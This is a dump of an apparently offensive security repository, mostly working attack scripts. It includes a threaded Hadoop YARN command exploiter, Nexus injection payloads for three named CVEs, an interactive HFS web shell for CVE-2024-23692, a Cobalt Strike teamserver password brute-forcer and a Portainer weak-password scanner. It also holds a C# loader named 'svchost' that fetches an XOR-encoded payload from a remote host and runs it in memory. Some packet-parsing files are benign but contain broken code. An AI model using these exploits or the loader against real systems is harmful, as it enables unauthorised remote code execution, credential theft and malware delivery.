89 | print("[-] No targets to scan!") 90 | return 91 | print("[+] Start scanning! Totally %s targets!" % str(len(self.target_list))) 92 | for target in self.target_list: 93 | if self.thread_size < self.thread_count: 94 | thread = HadoopYarnRCEVulnerabilityExploiter(target, self.command) 95 | self.thread_list.append(thread) 96 | self.thread_size += 1 97 | if self.thread_size == self.thread_count or self.thread_size == len(self.target_list) % self.thread_count: 98 | for thread in self.thread_list: 99 | thread.start() 100 | for thread in self.thread_list: 101 | thread.join() 102 | self.thread_list = [] 103 | self.thread_size = 0 104 | else: 105 | self.thread_list = [] 106 | self.thread_size = 0 107 | continue 108 | 109 | if __name__ == "__main__": 110 | parser = OptionParser("") 111 | parser.add_option("-t", dest="target", help="target to scan") 112 | parser.add_option("-f", dest="targetfile", help="target file to scan") 113 | parser.add_option("-s", dest="threadsize", help="size of threadpool?[10,15,20,25,30,35,40,45,50]") 114 | parser.add_option("-c", dest="command", help="command to execute") 115 | (options, args) = parser.parse_args() 116 | options.threadsize = int(options.threadsize) 117 | if options.threadsize not in [10, 15, 20, 25, 30, 35, 40, 45, 50]: 118 | options.threadsize = 10 119 | print("[+] Configure maximum thread count to %s!" % str(options.threadsize)) 120 | if options.command in ["", " ", None]: 121 | print("[-] Please input a command to execute!") 122 | sys.exit(0) 123 | scanner = HadoopYarnRCEScannerCreater(options.command, options.target, options.targetfile, options.threadsize) 124 | scanner.run() 125 | print("[+] Scanning finished! 
ByeBye!") 126 | -------------------------------------------------------------------------------- /POCS/NexusRCE.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import json 3 | import requests 4 | import urllib3 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | 8 | def cve_2020_10204(target, command, cookie): 9 | header = {"X-Requested-With": "XMLHttpRequest", "X-Nexus-UI": "true", 10 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " 11 | "Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0", 12 | "Accept": "*/*", "Content-Type": "application/json", "Origin": target, "Referer": target, 13 | "Accept-Encoding": "gzip, deflate, br", 14 | "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Cookie": cookie, 15 | "NX-ANTI-CSRF-TOKEN": cookie.split(";")[0].split("=")[1]} 16 | 17 | data = { 18 | "action": "coreui_User", 19 | "method": "update", 20 | "data": [ 21 | { 22 | "userId": "admin", 23 | "version": "2", 24 | "firstName": "admin", 25 | "lastName": "User", 26 | "email": "admin@example.org", 27 | "status": "active", 28 | "roles": ["nxadmin$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}" % command] 29 | } 30 | ], 31 | "type": "rpc", 32 | "tid": 11 33 | } 34 | 35 | url = target + "/service/extdirect" 36 | print() 37 | response = requests.post(url, headers=header, data=json.dumps(data), verify=False) 38 | print(response.status_code) 39 | print(response.text) 40 | 41 | 42 | def cve_2020_10199(target, command, cookie): 43 | header = {"X-Requested-With": "XMLHttpRequest", "X-Nexus-UI": "true", 44 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " 45 | "Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0", 46 | "Accept": "*/*", "Content-Type": "application/json", "Origin": target, "Referer": target, 47 | "Accept-Encoding": "gzip, deflate, br", 48 | 
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Cookie": cookie, 49 | "NX-ANTI-CSRF-TOKEN": cookie.split(";")[0].split("=")[1]} 50 | 51 | data = { 52 | "name": "internal", 53 | "online": "true", 54 | "storage": { 55 | "blobStoreName": "default", 56 | "strictContentTypeValidation": "true" 57 | }, 58 | "group": { 59 | "memberNames": [ 60 | "$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}" % command] 61 | } 62 | } 63 | url = target + "/service/rest/beta/repositories/go/group" 64 | response = requests.post(url, headers=header, data=json.dumps(data), verify=False) 65 | print(response.status_code) 66 | print(response.text) 67 | 68 | 69 | def cve_2019_7238(target, command, cookie=None): 70 | header = { 71 | "X-Requested-With": "XMLHttpRequest", 72 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " 73 | "Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0", 74 | "Accept": "*/*", 75 | "Content-Type": "application/json", 76 | } 77 | 78 | data = { 79 | "action": "coreui_Component", 80 | "method": "previewAssets", 81 | "data": [ 82 | { 83 | "page": 1, 84 | "start": 0, 85 | "limit": 50, 86 | "sort": [{"property": "name", "direction": "ASC"}], 87 | "filter": [ 88 | {"property": "repositoryName", "value": "*"}, 89 | { 90 | "property": "expression", 91 | "value": "233.class.forName('java.lang.Runtime').getRuntime().exec('%s')" % command 92 | }, 93 | {"property": "type", "value": "jexl"} 94 | ] 95 | } 96 | ], 97 | "type": "rpc", 98 | "tid": 8 99 | } 100 | url = target + "/service/extdirect" 101 | response = requests.post(url, headers=header, data=json.dumps(data), verify=False) 102 | print(response.status_code) 103 | print(response.text) 104 | 105 | 106 | if __name__ == '__main__': 107 | vuln = sys.argv[1] 108 | target = sys.argv[2] 109 | command = sys.argv[3] 110 | cookie = None 111 | try: 112 | cookie = sys.argv[4] 113 | except: 114 | cookie = "" 115 | if str(vuln) not in 
["10204", "10199", "7238"]: 116 | print("漏洞选择错误") 117 | sys.exit(0) 118 | func = {"10204": cve_2020_10204, "10199": cve_2020_10199, "7238": cve_2019_7238} 119 | function = func[vuln] 120 | function(target, command, cookie) 121 | 122 | -------------------------------------------------------------------------------- /POCS/hfs_get_shell.py: -------------------------------------------------------------------------------- 1 | import http.client 2 | import chardet # type: ignore 3 | import gzip 4 | import sys 5 | from urllib.parse import quote 6 | from io import BytesIO 7 | 8 | 9 | 10 | banner = """ 11 | ********************************************************************************* 12 | * HFS OS Shell Support(HFS <= 2.3m or 2.4.0 RC7) * 13 | * Based On CVE-2024-23692 * 14 | * Author: b0b@c * 15 | ********************************************************************************* 16 | """ 17 | 18 | 19 | def print_banner(): 20 | print(banner) 21 | 22 | 23 | def get_request(target: str, payload: str, header: dict): 24 | target_list = target.split(":") 25 | if len(target_list) == 3: 26 | protocol, target_address, target_port = target_list[0], target_list[1][2:], target_list[2] 27 | protocol = protocol 28 | target_port = int(target_port) 29 | elif len(target_list) == 2: 30 | protocol, target_address = target_list[0], target_list[1][2:] 31 | protocol = protocol 32 | target_port = 0 33 | else: 34 | raise Exception("Target Error!") 35 | connection = None 36 | try: 37 | if protocol == "https": 38 | target_port = 443 if target_port == 0 else target_port 39 | connection = http.client.HTTPSConnection(target_address, target_port) 40 | elif protocol == "http": 41 | target_port = 80 if target_port == 0 else target_port 42 | connection = http.client.HTTPConnection(target_address, target_port) 43 | else: 44 | raise Exception("Target URL Error!") 45 | except Exception as error: 46 | raise error 47 | 48 | connection.request('GET', payload, headers=header) 49 | response = 
connection.getresponse() 50 | return response 51 | 52 | 53 | def decode_response(response): 54 | raw_content = None 55 | if response.getheader('Content-Encoding') == 'gzip': 56 | compressed_data = response.read() 57 | response_data_bytes = BytesIO(compressed_data) 58 | raw_content = gzip.GzipFile(fileobj=response_data_bytes).read() 59 | else: 60 | raw_content = response.read() 61 | # 检测编码并解码 62 | if raw_content is None: 63 | return "" 64 | detected_encoding = chardet.detect(raw_content)['encoding'] 65 | html_content = raw_content.decode(detected_encoding or 'utf-8', errors='replace') 66 | return html_content 67 | 68 | 69 | def find_result(content, command): 70 | start_index = content.find("cmd=%s&search=" % command) 71 | end_index = content.find("====\n&tpl=list") 72 | if start_index == -1 or end_index == -1: 73 | return "" 74 | content = content[start_index:end_index] 75 | result = content.split("RESULT:")[1] 76 | result = result.strip() 77 | result = result.split(":%")[0] 78 | return result 79 | 80 | 81 | 82 | def execute_command(target, command: str) -> None: 83 | payload: str = f'/?n=%0A&cmd={command}&search=%25xxx%25url%25:%password%}}{{.exec|{{.?cmd.}}|timeout=15|out=abc.}}{{.?n.}}{{.?n.}}RESULT:{{.?n.}}{{.^abc.}}===={{.?n.}}' 84 | header: dict = { 85 | 'Host': '%s:80' % str(target.split(":")[1]), 86 | 'Connection': 'keep-alive', 87 | 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0', 88 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 89 | 'Accept-Language': 'en-US,en;q=0.5', 90 | 'Accept-Encoding': 'gzip, deflate, br', 91 | 'Upgrade-Insecure-Requests': '1' 92 | } 93 | html_content = None 94 | response = None 95 | try: 96 | response = get_request(target, payload, header) 97 | except Exception as error: 98 | print("[-] Error: %s" % str(error)) 99 | if response is not None: 100 | html_content = decode_response(response) 101 | else: 102 | html_content = "" 103 | if 
html_content is not None and html_content != "": 104 | result = find_result(html_content, command) 105 | else: 106 | result = "" 107 | return result[0:-6] 108 | 109 | 110 | def detect(target): 111 | print("[+] Try to get target shell!") 112 | try: 113 | result = execute_command(target, "systeminfo") 114 | if result.find("Microsoft Corporation") > 0: 115 | print("[+] Get shell succeed!") 116 | except Exception as error: 117 | print("[-] Get shell failed!") 118 | sys.exit(0) 119 | 120 | 121 | 122 | def get_shell(target): 123 | target_string = target.split("://")[1].split(":")[0] 124 | while True: 125 | command = input("[%s]>>> " % target_string) 126 | if command == 'exit': 127 | sys.exit(0) 128 | command = quote(command, safe='/:?=&') 129 | print(execute_command(target, command)) 130 | 131 | 132 | 133 | if __name__ == "__main__": 134 | target = sys.argv[1] 135 | target = target [0:-1] if target[-1] == "/" else target 136 | print_banner() 137 | detect(target) 138 | get_shell(target) 139 | 140 | 141 | -------------------------------------------------------------------------------- /PacketTools/PacketStruct/PacketStruct.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | class Frame(object): 4 | def __init__(self,smac,dmac,protocol): 5 | self.smac = smac 6 | self.dmac = dmac 7 | self.protocol = protocol 8 | 9 | 10 | class Network(object): 11 | def __init__(self,sip,dip,protocol,df,mf,packetid,size,version,ttl): 12 | self.sip = sip 13 | self.dip = dip 14 | self.protocol = protocol 15 | self.df = df 16 | self.mf = mf 17 | self.packetid = packetid 18 | self.size = size 19 | self.version = version 20 | self.ttl = ttl 21 | 22 | 23 | class Transport(object): 24 | def __init__(self,sport=None,dport=None,code=None,itype=None,size=None,data=None,ack=None,seq=None,flags=None,window=None,up=None): 25 | self.sport = sport 26 | self.dport = dport 27 | self.code = code 28 | self.itype = itype 29 | self.size = size 30 
| self.ack = ack 31 | self.seq = seq 32 | self.flags = flags 33 | self.window = window 34 | self.up = up 35 | 36 | class Data(object): 37 | def __init__(self,data): 38 | self.data = data 39 | 40 | 41 | class Packet(object): 42 | def __init__(self,frame,network,transport,data): 43 | self.frame = frame if isinstance(frame,Frame) else raise Exception 44 | self.network = network if isinstance(network,Network) else raise Exception 45 | self.transport = transport if isinstance(transport,Transport) else raise Exception 46 | self.data = data if isinstance(data,Data) else raise Exception 47 | -------------------------------------------------------------------------------- /PacketTools/PacketStruct/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 2 | 'PacketStruct', 3 | ] 4 | -------------------------------------------------------------------------------- /PacketTools/PcapSniffer/sniffer.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | ''' 4 | 网络流量过滤和获取 5 | ''' 6 | 7 | 8 | # 全局配置ß 9 | import sys 10 | sys.path.append("..") 11 | 12 | 13 | # 引入依赖的包 14 | import pcap 15 | from ProtocolAnylast.Ethernet.EthernetAnylast import EthernetPacket 16 | from ProtocolAnylast.IPNetwork.IPAnylast import IPNetworkAnylast 17 | from ProtocolAnylast.Transport.TcpAnylast import TcpAnylast 18 | from ProtocolAnylast.Transport.UdpAnylast import UdpAnylast 19 | from ProtocolAnylast.Transport.IcmpAnylast import IcmpAnylast 20 | 21 | 22 | # 定义嗅探器 23 | class Sniffer(object): 24 | """定义抓包类""" 25 | def __init__(self,iftername): 26 | '''创建针对网卡的抓包嗅探器''' 27 | self.sniffer = pcap.pcap(name=iftername,immediate=True) 28 | 29 | 30 | def filter(self,filterString): 31 | '''设置过滤器''' 32 | self.sniffer.setfilter(filterString) 33 | 34 | def Anylast_Packet_Handler(self): 35 | for time,packet in self.sniffer: 36 | packet = EthernetPacket(packet) 37 | if packet.getType() == "IPv4": 38 | 
packet = IPNetworkAnylast(packet.getData()) 39 | if packet.getProcotol() == 'ICMP': 40 | packet = IcmpAnylast(packet.getData()) 41 | print packet.getCode() 42 | print packet.getType() 43 | print packet.getData() 44 | 45 | #pass 46 | 47 | if __name__ == "__main__": 48 | sniffer = Sniffer("en4") 49 | sniffer.Anylast_Packet_Handler() 50 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/Application/HttpAnylast.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/b0bac/SecurityTools/b05cfa45a6de053ad0f5eb25a22c2b0a44e602be/PacketTools/ProtocolAnylast/Application/HttpAnylast.py -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/Ethernet/EthernetAnylast.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | ''' 4 | 链路层帧解析 5 | ''' 6 | 7 | import dpkt 8 | 9 | 10 | #定义帧解析类 11 | class EthernetPacket(object): 12 | '''数据报文链路层分解''' 13 | def __init__(self,packet): 14 | '''初始化链路层数据''' 15 | self.packet = dpkt.ethernet.Ethernet(packet) 16 | 17 | @staticmethod 18 | def numhex(number): 19 | string = str(hex(number)).split('x')[-1] 20 | string = '0%s'%string if len(string) == 1 else string 21 | return string 22 | 23 | def getSrc(self): 24 | '''返回源mac地址''' 25 | return "".join(str(map(EthernetPacket.numhex,tuple(map(ord,list(self.packet.src))))))[1:-1].replace(',',':').replace("'","").replace(" ","") 26 | 27 | def getDst(self): 28 | '''返回目的mac地址''' 29 | return "".join(str(map(EthernetPacket.numhex,tuple(map(ord,list(self.packet.dst))))))[1:-1].replace(',',':').replace("'","").replace(" ","") 30 | 31 | def getType(self): 32 | '''获取数据链路层的Type''' 33 | _type = { 34 | 2048:"IPv4", 35 | 2054:"Arp", 36 | 34525:"IPv6", 37 | } 38 | return _type.get(int(self.packet.type),"未解析") 39 | 40 | def getData(self): 41 | return self.packet.data 42 | 
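--------------------------------------------------------------------------------
/PacketTools/ProtocolAnylast/Ethernet/__init__.py:
--------------------------------------------------------------------------------
__all__ = [
    "EthernetAnylast",
]

--------------------------------------------------------------------------------
/PacketTools/ProtocolAnylast/IPNetwork/IPAnylast.py:
--------------------------------------------------------------------------------
# -*- coding:utf-8 -*-

'''
Network-layer packet parsing.
'''

import dpkt
import socket


# Packet parser class
class IPNetworkAnylast(object):
    '''Read-only accessors over the network-layer part of a captured packet.

    The wrapped object must expose the attributes read below (src, dst, p,
    df, mf, id, len, v, ttl, data) and a get_proto() method. In sniffer.py
    it is the payload of an Ethernet frame whose type resolved to "IPv4".
    The content comes straight off the wire, so every value returned here
    is untrusted input for whatever consumes it.
    '''

    def __init__(self, packet):
        '''Store the network-layer object; nothing is parsed or validated here.'''
        self.packet = packet

    def getSrc(self):
        '''Return the source IP address as a dotted-quad string.

        socket.inet_ntoa accepts only a 4-byte packed IPv4 address, so this
        raises if src is not exactly 4 bytes long.
        '''
        return socket.inet_ntoa(self.packet.src)

    def getDst(self):
        '''Return the destination IP address as a dotted-quad string.

        Same 4-byte restriction as getSrc().
        '''
        return socket.inet_ntoa(self.packet.dst)

    def getProcotol(self):
        '''Return the name of the transport-layer protocol as a string.

        The method name keeps its original spelling because sniffer.py
        calls it under that name.
        '''
        # NOTE(review): get_proto presumably raises for a protocol number it
        # does not know; a caller fed arbitrary captured traffic should be
        # ready for that -- confirm against the dpkt version in use.
        return str(self.packet.get_proto(self.packet.p).__name__)

    def getDontFragment(self):
        '''Return the value of the Don't Fragment flag.'''
        return self.packet.df

    def getMoreFragment(self):
        '''Return the value of the More Fragments flag.'''
        return self.packet.mf

    def getID(self):
        '''Return the packet's identification field.'''
        # The first parameter was previously spelled "slef", so the body's
        # reference to self raised NameError on every call.
        return self.packet.id

    def getSize(self):
        '''Return the packet's len field.'''
        return self.packet.len

    def getVersion(self):
        '''Return the packet's version field.'''
        return self.packet.v

    def getTTL(self):
        '''Return the Time To Live value.'''
        return self.packet.ttl

    def getData(self):
        '''Return the transport-layer payload carried by this packet.'''
        return self.packet.data

--------------------------------------------------------------------------------
/PacketTools/ProtocolAnylast/IPNetwork/__init__.py:
--------------------------------------------------------------------------------
__all__ = [
    "IPAnylast",
]

--------------------------------------------------------------------------------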
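/PacketTools/ProtocolAnylast/Transport/IcmpAnylast.py:
--------------------------------------------------------------------------------
# -*- coding:utf-8 -*-

'''
Transport-layer packet parsing.
'''

import dpkt


# Packet parser class
class IcmpAnylast(object):
    '''Read-only accessors over an ICMP message taken from a captured packet.

    The wrapped object must expose code, type and data. In sniffer.py it is
    the payload of an IP packet whose protocol name resolved to 'ICMP'.
    '''

    def __init__(self, packet):
        '''Store the ICMP object; nothing is parsed or validated here.'''
        self.packet = packet

    def getCode(self):
        '''Return the ICMP code.'''
        return self.packet.code

    def getType(self):
        '''Return the ICMP type.'''
        return self.packet.type

    def getData(self):
        '''Return the data carried by the ICMP message.'''
        return self.packet.data

--------------------------------------------------------------------------------
/PacketTools/ProtocolAnylast/Transport/TcpAnylast.py:
--------------------------------------------------------------------------------
# -*- coding:utf-8 -*-

'''
Transport-layer packet parsing.
'''

import dpkt


# Packet parser class
class TcpAnylast(object):
    '''Read-only accessors over a TCP segment taken from a captured packet.

    The wrapped object must expose sport, dport, ack, seq, flags, win, urp,
    len and data. All values originate from captured traffic and are
    untrusted input for whatever consumes them.
    '''

    def __init__(self, packet):
        '''Store the TCP object; nothing is parsed or validated here.'''
        self.packet = packet

    def getSrc(self):
        '''Return the source port.'''
        return self.packet.sport

    def getDst(self):
        '''Return the destination port.'''
        return self.packet.dport

    def getAckNumber(self):
        '''Return the acknowledgement number.'''
        return self.packet.ack

    def getSequence(self):
        '''Return the sequence number.'''
        return self.packet.seq

    def getFlags(self):
        '''Return the six classic TCP control bits as '0'/'1' strings.

        The tuple order is (URG, ACK, PSH, RST, SYN, FIN). Higher bits of
        the flags field (ECE, CWR, ...) are not reported.
        '''
        # Mask to the low six bits so that a flags value wider than expected
        # cannot shift the bit positions read below.
        urg, ack, psh, rst, syn, fin = format(self.packet.flags & 0x3F, '06b')
        return (urg, ack, psh, rst, syn, fin)

    def getWindows(self):
        '''Return the window value.'''
        return self.packet.win

    def getUrgentPointer(self):
        '''Return the urgent pointer.'''
        # The first parameter was previously spelled "slef", so the body's
        # reference to self raised NameError on every call.
        return self.packet.urp

    def getSize(self):
        '''Return the len attribute of the wrapped object.'''
        # NOTE(review): a TCP header carries no length field; confirm that
        # the object passed in really exposes `len`, otherwise this raises
        # AttributeError.
        return self.packet.len

    def getData(self):
        '''Return the payload carried by the segment.'''
        return self.packet.data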
60 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/Transport/UdpAnylast.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | ''' 4 | 传输层包解析 5 | ''' 6 | 7 | import dpkt 8 | 9 | 10 | #定义包解析类 11 | class UdpAnylast(object): 12 | '''数据报文传输层分解''' 13 | def __init__(self,packet): 14 | '''初始化传输层数据''' 15 | self.packet = packet 16 | 17 | def getSrc(self): 18 | '''返回源端口''' 19 | return self.packet.sport 20 | 21 | def getDst(self): 22 | '''返回目的端口''' 23 | return self.packet.dport 24 | 25 | def getSize(self): 26 | '''获取数据包大小''' 27 | return self.packet.ulen 28 | 29 | def getData(self): 30 | '''获取传输层数据''' 31 | return self.packet.data 32 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/Transport/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 2 | "TCP", 3 | "UDP", 4 | "ICMP" 5 | ] 6 | -------------------------------------------------------------------------------- /PacketTools/ProtocolAnylast/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 2 | "Application", 3 | "Ethernet", 4 | "Transport", 5 | "IPNetwork", 6 | ] 7 | -------------------------------------------------------------------------------- /PacketTools/Stream/Stream.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | 4 | import hashlib 5 | 6 | 7 | # 定义TCP流解析类 8 | class Stream(object): 9 | '''定义TCP流解析''' 10 | def __init__(self,streamhash): 11 | self.streamhash = streamhash 12 | self._packets = [] 13 | 14 | @staticmethod 15 | def tuplehash(sip,dip,sport,dport): 16 | hashstring = sip + dip + sport + dport 17 | sha256 = hashlib.sha256() 18 | sha256.update(hashstring) 19 | return sha256.hexdigest() 20 | 21 | def addPacket(self,packet): 22 | if 
isinstance(packet,Packet): 23 | self._packets.append(packet) 24 | return True 25 | else: 26 | return False 27 | 28 | def getPackets(self): 29 | return slef._packets 30 | -------------------------------------------------------------------------------- /PacketTools/Stream/StreamStruct.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | 4 | # 定义TCP流解析的存储结构 5 | class StreamStruct(object): 6 | '''TCP流解析实例存储结构''' 7 | def __init__(self): 8 | '''结构初始化''' 9 | self._stream = {} 10 | self.size = 0 11 | 12 | def addStream(self,streamhash,stream): 13 | '''添加流实例''' 14 | self._stream[streamhash] = stream 15 | self.size += 1 16 | 17 | def getStream(self,streamhash): 18 | '''获取流实例''' 19 | return self._stream.get(streamhash,"None") 20 | 21 | def getHashs(self): 22 | return self._stream.keys() 23 | 24 | def getStreams(self): 25 | return self._stream 26 | -------------------------------------------------------------------------------- /PentestCode/CobaltStrikeCrack.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import ssl 3 | import time 4 | import socket 5 | import _thread 6 | 7 | PASSWORD = None 8 | 9 | class CobaltStrikeConnector: 10 | """Connect to the Teamserver of the Cobalt Strike Control Center""" 11 | def __init__(self): 12 | """Create a Cobalt Strike Connecter""" 13 | self.connector = None 14 | self.sslconnector = None 15 | self.context = ssl.SSLContext() 16 | self.context.verify_mode = ssl.CERT_NONE 17 | 18 | def isConnected(self): 19 | """Check if the client connection has been in the state of established or not""" 20 | if self.connector or self.sslconnector: 21 | return True 22 | else: 23 | return False 24 | 25 | def openConnection(self, hostname, port): 26 | """Connect to the Cobalt Strike Control Center""" 27 | self.connector = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | self.connector.settimeout(3) 29 | self.sslconnector = 
self.context.wrap_socket(self.connector) 30 | 31 | if hostname == socket.gethostname(): 32 | self.sslconnector.connect((socket.gethostbyname_ex(hostname)[2][0], port)) 33 | else: 34 | self.sslconnector.connect((hostname, port)) 35 | 36 | def closeConnetion(self): 37 | """Disconnect the Cobalt Strike Control Center""" 38 | if self.connector: 39 | self.connector.close() 40 | self.connector = None 41 | self.sslconnector = None 42 | 43 | def dataSend(self, data): 44 | """Send packet data to the Cobalt Strike Control Center""" 45 | if not self.sslconnector: 46 | return False 47 | try: 48 | self.sslconnector.sendall(data) 49 | except Exception as reason: 50 | return False 51 | return True 52 | 53 | def dataReceive(self): 54 | if not self.sslconnector: 55 | raise 56 | size = 0 57 | data = b"" 58 | while size < 4: 59 | buffer = self.sslconnector.recv() 60 | data += buffer 61 | size += len(buffer) 62 | return data 63 | 64 | class CobaltStrikeCracker: 65 | def __init__(self, hostname, port, password): 66 | self.hostname = hostname 67 | self.port = port 68 | self.password = password 69 | self.connector = CobaltStrikeConnector() 70 | 71 | def Crack(self): 72 | consquence = None 73 | if(len(self.password) > 0): 74 | self.connector.openConnection(self.hostname, self.port) 75 | print("[+] Try new password: " + password) 76 | data = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A")) 77 | self.connector.dataSend(data) 78 | if self.connector.isConnected(): 79 | consquence = self.connector.dataReceive() 80 | if self.connector.isConnected(): 81 | self.connector.closeConnetion() 82 | if consquence == bytearray(b"\x00\x00\xca\xfe"): 83 | global PASSWORD 84 | PASSWORD = password 85 | else: 86 | print("[-] We got password failed") 87 | 88 | def CrackThread(hostname, port, filename): 89 | try: 90 | cracker = CobaltStrikeCracker(hostname, port, filename) 91 | cracker.Crack() 92 | except Exception as reason: 93 | 
print("[-] Crack Thread Error!") 94 | 95 | if __name__ == "__main__": 96 | hostname = sys.argv[1] 97 | port = int(sys.argv[2]) 98 | filename = sys.argv[3] 99 | passwords = [] 100 | with open(filename, 'r') as filereader: 101 | for line in filereader.readlines(): 102 | line = line.replace("\r", "").replace("\n", "") 103 | passwords.append(line) 104 | print("[+] Config Hostname: " + hostname) 105 | print("[+] Config Service Port:" + str(port)) 106 | print("[+] Loading Passwords File: " + filename) 107 | for password in passwords: 108 | _thread.start_new_thread(CrackThread, (hostname, port, password)) 109 | time.sleep(5) 110 | if PASSWORD != None: 111 | print("[+] Cracked Succeed! Password:"+str(PASSWORD)) 112 | else: 113 | print("[-] Cracked Failed!") 114 | -------------------------------------------------------------------------------- /PentestCode/CobaltStrikeOnlineShellcodeLoader.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace svchost 8 | { 9 | using System; 10 | using System.IO; 11 | using System.Net; 12 | using System.Runtime.InteropServices; 13 | using System.Text; 14 | using System.Diagnostics; 15 | 16 | namespace Program 17 | { 18 | class Program 19 | { 20 | [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 21 | [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 22 | [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 23 | public static string GetLicense(string host) 24 | { 25 | //byte[] arraryByte; 26 | HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(host); 27 
| request.Method = "GET"; 28 | using (HttpWebResponse web = (HttpWebResponse)request.GetResponse()) 29 | { 30 | StreamReader reader = new StreamReader(web.GetResponseStream(), Encoding.UTF8); 31 | String resource = reader.ReadToEnd(); 32 | return resource; 33 | } 34 | } 35 | 36 | public static Byte[] GetLicenseCode(string content) 37 | { 38 | return Convert.FromBase64String(content); 39 | } 40 | 41 | public static byte[] DecodeLicenseCode(byte[] input) 42 | { 43 | char[] key = { 'B', '4', }; 44 | byte[] output = new byte[input.Length]; 45 | for (int i = 0; i < input.Length; i++) 46 | { 47 | output[i] = (byte)(input[i] ^ key[i % key.Length]); 48 | } 49 | return output; 50 | } 51 | static void Main(string[] args) 52 | { 53 | string resource = GetLicense("http://192.168.1.1:8080/License.txt"); 54 | byte[] code = DecodeLicenseCode(GetLicenseCode(resource)); 55 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)code.Length, (UInt32)0x1000, (UInt32)0x40); 56 | Marshal.Copy(code, 0, (IntPtr)(funcAddr), code.Length); 57 | IntPtr hThread = IntPtr.Zero; 58 | UInt32 threadId = 0; 59 | IntPtr pinfo = IntPtr.Zero; 60 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 61 | WaitForSingleObject(hThread, 0xFFFFFFFF); 62 | } 63 | } 64 | } 65 | 66 | } 67 | -------------------------------------------------------------------------------- /PentestCode/PortainerWeakPasswordScanner.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import json 3 | import urllib3 4 | import requests 5 | import threading 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | 9 | def read_file_to_list(filename: str) -> list: 10 | try: 11 | _list: list = [] 12 | with open(filename, 'r') as file_reader: 13 | for line in file_reader.readlines(): 14 | line = line.split('\n')[0].split('\r')[0] 15 | _list.append(line) 16 | _line = list(set(_list)) 17 | return _list 18 | except Exception as error: 19 | print("[-] Read [%s] [error: 
%s]" % (filename, str(error))) 20 | return [] 21 | 22 | 23 | def portainer_weak_password_verify(target_url_ip: str, username: str, password: str) -> bool: 24 | target_url = target_url_ip + "/api/auth" if not target_url_ip.endswith("/") else target_url_ip + "api/auth" 25 | credentials: dict = { 26 | "username": username, 27 | "password": password 28 | } 29 | header: dict = { 30 | "User-Agent": "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36", 31 | "Accept": "application/json, text/plain, */*", 32 | "Content-Type": "application/json", 33 | "Accept-Encoding": "gzip, deflate", 34 | "Accept-Language": "zh-CN, zh; q=0.9" 35 | } 36 | data = json.dumps(credentials) 37 | try: 38 | response: requests.Response = requests.post(url=target_url, headers=header, data=data, timeout=5, verify=False) 39 | except Exception as error: 40 | print("[-] Failed [%s] [Connection Failed]" % str(target_url)) 41 | return False 42 | code: str = str(response.status_code) 43 | try: 44 | raw_text: dict = json.loads(response.text) 45 | except Exception as error: 46 | if code == "404": 47 | print("[-] Error [%s] [Response Code 404] " % target_url) 48 | else: 49 | print(response.text) 50 | return False 51 | 52 | keys: list = raw_text.keys() 53 | if code == "200" and "jwt" in keys: 54 | print("[*] Found [%s] [Username:%s, Password:%s]" % (target_url, username, password)) 55 | return True 56 | elif code == "422" or code == "403" or code == "303": 57 | try: 58 | detail = raw_text["details"] 59 | except Exception as error: 60 | print("[-] Error [%s] [Reason: %s]" % (target_url, 